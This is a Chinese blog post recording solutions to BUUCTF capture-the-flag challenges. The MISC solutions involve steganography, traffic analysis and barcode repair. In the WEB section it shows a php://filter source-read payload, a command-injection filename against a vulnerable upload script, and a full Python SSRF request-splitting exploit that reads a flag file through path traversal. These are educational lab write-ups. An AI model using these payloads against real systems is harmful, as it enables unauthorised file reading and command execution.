BUUCTF-刷题记录-10

最新推荐文章于 2024-05-13 21:29:46 发布
最新推荐文章于 2024-05-13 21:29:46 发布
阅读量1.3k 收藏 2
点赞数 1
分类专栏: BUUCTF刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45628145/article/details/108948808
版权

MISC

[watevrCTF 2019]Unspaellablle

词频分析,没有什么结果,然后看文件前面很有规律的样子,看起来像个什么文章?直接谷歌搜索到一个差不多的,不过有一点区别,链接
然后去linux下面使用vimdiff命令查看两个文件的差别,发现把差别字符提取出来也就是flag了。

vimdiff 1.txt 2.txt


也就是watevr{icantspeel_tiny.cc/2qtdez}

[INSHack2018]Spreadshit

搜索空格,全部选中,发现flag:INSA{3cf6463910edffb0}

[SUCTF2018]dead_z3r0

在文件中发现pyc标志,把其提取出来,删去33 0D 0D 0A前面的字符串进行反编译

得到

def encryt(key, plain):
    cipher = ''
    for i in range(len(plain)):
        cipher += chr(ord(key[i % len(key)]) ^ ord(plain[i]))
    return cipher

def getPlainText():
    plain = ''
    
def main():
    key = 'LordCasser'
    plain = getPlainText()
    cipher = encryt(key, plain)

if __name__ == '__main__':
    main()

但是很奇怪的东西,可能前面的一串字符串是加密过后的东西,然后进行解密。然后想到了stegosaurus来进行一个pyc的隐写,跑一下,得到flag。

[INSHack2017]remote-multimedia-controller

分析TCP流,在第二个包中发现flag.txt,是一个base64套娃, 最后得到flag

[BSidesSF2020]barcoder

使用StegSolve工具,查看红色通道

然后补齐中间的条形码就可以了,我用的是win10自带的画图工具,画直线就好了,也不是很难补,耐心一点就好了,我终于是补完了^^

不过还是有点问题💔,扫不出来,下面这个是官方的条形码

扫码得到flag

[XMAN2018排位赛]ppap

追踪tcp流,发现一段base64

使用notepad++解码保存为一张jpg,foremost分离出来了很多张图片,和两个压缩包,压缩包都是加密的,也是一样的,内容都是flag.txt,爆破了很久密码都没有爆破出来,后来在这个网站上面得到密码skullandcrossbones,解压得到flag。

WEB

[N1CTF 2018]eating_cms

先在register.php注册一个账号,进入之后发现地址是这样的

使用伪协议读取源码成功

/user.php?page=php://filter/convert.base64-encode/resource=index

大概可以读取到这些文件

主要分析function.php,看下这个函数

function filter_directory()
{
    $keywords = ["flag","manage","ffffllllaaaaggg"];
    //有一个过滤
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    //这里是有个parse_url函数解析漏洞,可以绕过下面的关键词检测
    parse_str($uri['query'], $query);
    foreach($keywords as $token)
    {
        foreach($query as $k => $v)
        {
            if (stristr($k, $token))
                hacker();
            if (stristr($v, $token))
                hacker();
        }
    }
}

关于parse_url函数解析漏洞,这个漏洞是这样的,当我们输入一个不正常的url时,该函数会返回False,例如,输入下面这种uel的时候

http://127.0.0.1//index.php?a=1

因此,这里可以通过parse_url函数解析漏洞来绕过关键词的检测,读取flag等文件,不过只有ffffllllaaaaggg有回显,得到

<?php
if (FLAG_SIG != 1){
    die("you can not visit it directly");
}else {
    echo "you can find sth in m4aaannngggeee";
}
?>

继续读取m4aaannngggeee,得到

<?php
if (FLAG_SIG != 1){
    die("you can not visit it directly");
}
include "templates/upload.html";
?>

访问/templates/upload.html,存在一个文件上传点,不过有问题,路径不太对劲。

读取一下upllloadddd.php这个文件,得到

<?php
$allowtype = array("gif","png","jpg");
$size = 10000000;
$path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
$filename = $_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name'])){
    if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){
        die("error:can not move");
    }
}else{
    die("error:not an upload file!");
}
$newfile = $path.$filename;
echo "file upload success<br />";
echo $filename;
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
echo "<img src='data:image/png;base64,".$picdata."'></img>";
if($_FILES['file']['error']>0){
    unlink($newfile);
    die("Upload file error: ");
}
$ext = array_pop(explode(".",$_FILES['file']['name']));
if(!in_array($ext,$allowtype)){
    unlink($newfile);
}
?>

简单分析发现,是存在一个竞争上传漏洞和一个文件名代码执行漏洞的,可以本地构造一个表单来进行上传,也可以直接把刚刚的上传页面给改一下,像这样子

构造文件名为;ls;#.png这样子的文件,进行上传

来写一个木马看看,不知道有没有权限

看起来是成功了,但是去ls的时候并没有发现这个文件,应该还是没有成功。
发现…/被过滤了,但是可以直接cd ..来绕过,发现了flag,然后cat即可。

[GYCTF2020]Node Game

题目给了源码,然后还有一个上传点,不过说了只有admin才可以用,直接上传的话会回显我们不是admin,那么就来审计代码吧!
发现了这个

if (!ip.includes('127.0.0.1')) {
        obj.msg="only admin's ip can use it"
        res.send(JSON.stringify(obj));
        return 
    }

原来是这样判断是不是管理员的,但是又是remoteaddress,我们伪造不了😅😅😅,所以是要找到一个SSRF的点,从而来进行一个文件上传。
然后看到/core路由,关键代码在这里

if (q) {
        var url = 'http://localhost:8081/source?' + q
        console.log(url)
        var trigger = blacklist(url);
        if (trigger === true) {
            res.send("<p>error occurs!</p>");
        }

可以传入一个q参数,然后服务器去请求,不过有个黑名单过来查,这里就存在一个SSRF了,可以通过这个点,来进行一个拆分请求,从而可以利用刚刚的文件上传点,拆分请求SSRF参考这个链接
文件上传中有这么一句代码

var file_path = '/uploads/' + req.files[0].mimetype +"/";

由于MIME可控,导致上传路径可控,也就是说可以进行任意目录的一个文件上传。然后是在action参数的一个地方,会把我们上传到template目录下面的pug文件进行一个渲染并且返回,所以说我们如果往这个目录上传文件中有一些命令的话是会执行的,这里我们使用文件包含的操作。往template目录下面上传一个pug文件来包含在根目录下面的flag,然后通过访问?action=文件名,来进行这个操作,返回这个flag,脚本如下

import urllib.parse
import requests

payload = ''' HTTP/1.1

POST /file_upload HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------919695033422425209299810
Content-Length: 291

----------------------------919695033422425209299810
Content-Disposition: form-data; name="file"; filename="flag.pug"
Content-Type: ../template

doctype html
html
  head
    style
      include ../../../../../../../flag.txt

----------------------------919695033422425209299810--

GET /flag HTTP/1.1
x:'''
payload = payload.replace("\n", "\r\n")
payload = ''.join(chr(int('0xff' + hex(ord(c))[2:].zfill(2), 16)) for c in payload)
requests.get('http://f27f3083-d48e-4e06-b1d5-8f0b2967aac8.node3.buuoj.cn/core?q=' + urllib.parse.quote(payload))
getflag = 'http://f27f3083-d48e-4e06-b1d5-8f0b2967aac8.node3.buuoj.cn/?action=flag'
res = requests.get(getflag)
print(res.text)

运行即可得到flag。

秋风瑟瑟...
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
BUUCTF-MISC-[watevrCTF 2019]Unspaellablle
zippo1234的博客
10-23 786
BUUCTF-MISC-[watevrCTF 2019]Unspaellablle[watevrCTF 2019]Unspaellablle题目分析开始1.题目2.分析3.找原文4.比较5. get flag结语 每天一题,只能多不能少 [watevrCTF 2019]Unspaellablle 题目分析 国外的比赛比较常见这种,需要你去古狗一下。个人比较常见的还是词频字频分析 开始 1.题目 给了一个txt。里面是。。诗歌?反正诗歌英语的文章。 百度之后是什么星际之子。之类的。 2.分析 一开始觉得可能
BUUCTF-MISC-[BSidesSF2020]barcoder
zippo1234的博客
10-23 1338
BUUCTF-MISC-[BSidesSF2020]barcoder[BSidesSF2020]barcoder题目分析开始1.题目2.修复(1)把条形码部分单独截图出来(2)photoshop修复(3)逐段修复3.识别条形码4.get flag结语 每天一题,只能多不能少 [BSidesSF2020]barcoder 题目分析 条形码修复 开始 1.题目 Reveal my identity! What's the flag encoded in the badge? 就是要修复条形码。之前有很多类似
crypto学习~buuctf~词频类型
最新发布
2401_82887816的博客
05-13 244
有数字0~9,字母A~Z,推测是base64,在线网站解密,但是不对上网搜,有一种叫英文字母出现频率分析破解密文的方法英文语言基于其固有的单词构成体系和词汇使用的频度,使得构成英文文章的字母出现的频率是相对固定的,然后解这个题可以用在线的爆破工具得到一段通顺的英文,在末尾提到"the key is"并且题目说答案是32位,刚好此处就是32位,将大写字母替换成小写字母之后提交。
BUUCTF Crypto 浪里淘沙 wp
hsqGOD's blog
03-15 2981
这道题打开txt文档一看,大量的英文单词而且中间还没有空格,再结合题目给到的一串数字4、8、11、15、16可以考虑到是跟字频有关,但是并不能有效找到脚本或者工具可以识别不带空格的词频,于是掏出了神奇的word 我们可以通过这种方法迅速的找到每个单词的词频,然后再把已经找到的全部替换为1,避免重复查找,然后再放到excel中进行排序 标注起题目要求的编号组合起字符串即可得到flag flag{...
BUUCTF MISC刷题笔记(七)
volcano的博客
08-27 3112
BUUOJMisc Misc
BUUCTF-PWN刷题记录-10
weixin_44145820的博客
04-19 846
目录wustctf2020_number_game(neg操作原理)zctf2016_note2(强制转换溢出,unlink)wustctf2020_name_your_cat wustctf2020_number_game(neg操作原理) 需要输入一个数,变为负数之后还是负数 这题就设计计组知识了,neg的操作为按位取反+1,而0x80000000取反加一之后仍然是0x80000000,所以...
BUUCTF-PWN刷题记录-11
weixin_44145820的博客
04-22 836
目录wustctf2020_name_your_cat wustctf2020_name_your_cat
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
【变量覆盖漏洞详解】 ...这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: ...攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成安全风险。... ...2. **extract()函数使用不当**: `extract()`函数会从数组中...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
BUUCTF Reverse CrackRTF-附件资源
03-05
BUUCTF Reverse CrackRTF-附件资源
CTF在线工具及学习资料汇总
尼伯龙根
01-18 6982
隐写术总结: https://www.cnblogs.com/k1two2/p/5170178.html 开源中国在线工具: http://tool.oschina.net/ binwalk windows的安装和使用方法: http://www.cnblogs.com/pcat/p/5256288.html 古典密码加解密(凯撒、维吉尼亚、当铺): http://www.zjslov...
CTF攻防世界刷题51-
wuwuliuliu0524的博客
03-02 7563
目录 51、Just-No-One 52、labour 53、hong 54、4-2 55、low 56、心仪的公司 57、misc1 58、Miscellaneous-300 59、很普通的Disco 60、肥宅快乐题 61、warmup 62、签到题 63、funny_video 64、隐藏的信息 65、miscmisc 66、奇怪的TTL字段 67、2-1 68、halo 69、互相伤害!!! 51、Just-No-One 这一题实在一言难尽,它居然在协议里,
图片隐写(持续更新)
zip471642048的博客
05-17 7551
文章目录图片隐写基础1图片隐写基础2 图片隐写基础1 题目地址 : https://ce.pwnthebox.com/challenges?type=1&diff=easy&id=92 010editor发现flag.docx,用binwalk分解 图片隐写基础2 题目地址 : https://ce.pwnthebox.com/challenges?type=1&page=1&diff=easy&id=93 binwalk分解无果猜测是lsb但是也没有可疑之处,
[GYCTF2020]Node Game
shinygod的博客
02-12 323
要注意的就是这个 CRLF 编码后攻击的时候总是崩溃,试了半天才成功,不知道是不是之前的数据包有问题。把 vps 替换一下就可以了,也可以用有相似功能的网站,或者其他的方法。这边就不多赘述了:下面大佬讲的就很清楚。nc 一下就可以了。
[GYCTF2020]Node Game-nodejs通过拆分攻击实现的SSRF攻击
cjdgg的博客
08-16 1554
[GYCTF2020]Node Game 漏洞:通过拆分请求实现的SSRF攻击 假设一个服务器,接受用户输入,并将其包含在通过HTTP公开的内部服务请求中,像这样: GET /private-api?q=<user-input-here> HTTP/1.1 Authorization: server-secret-key 如果服务器未正确验证用户输入,则攻击者可能会直接注入协议控制字符到请求里。假设在这种情况下服务器接受了以下用户输入: "x HTTP/1.1\r\n\r\nDELETE /p
从 [GYCTF2020]Node Game 了解 nodejs HTTP拆分攻击
ShenZ的博客
08-29 966
nodejs HTTP拆分攻击 nodejs 8.12 Node.js API 文档 当 Node.js 使用 http.get 向特定路径发出HTTP 请求时,发出的请求实际上被定向到了不一样的路径,这是因为NodeJS 中 Unicode 字符损坏导致的 HTTP 拆分攻击 原理 Unicode原理 对于不包含主体的请求,Node.js默认使用“latin1”,这是一种单字节编码字符集,不能表示高编号的Unicode字符,例如????这个表情。所以,当我们的请求路径中含有多字节编码的Unico
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取或者修改数据库中的数据。通常,这种漏洞主要存在于动态网页应用程序中,比如通过用户输入生成SQL查询语句的网页。攻击者可以通过在用户输入的数据中插入SQL代码,从而绕过正常的验证机制,查看、修改或者删除数据库中的数据。 为了解决注入漏洞,我们需要在编写动态网页应用程序时,对用户输入的数据进行严格的验证和过滤,避免将恶意代码传递给数据库。 对于buuctf-强网杯2019随便注这道题目,我们需要了解题目的具体要求和给定的环境,然后通过分析和尝试来找到漏洞的利用方法。可能的解题思路包括对输入的数据进行SQL注入、获取数据库中的信息或者修改数据库中的数据等等。 解决这道题目需要具备一定的网络安全知识和相关工具的使用能力。通过不断的尝试和调试,找到并利用漏洞成功获取到flag(标志),即为完成题目。 总之,buuctf-强网杯2019随便注是一道涉及注入漏洞的CTF题目,要求我们通过找到并利用漏洞来获取flag。完成这道题目需要一定的网络安全知识和技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值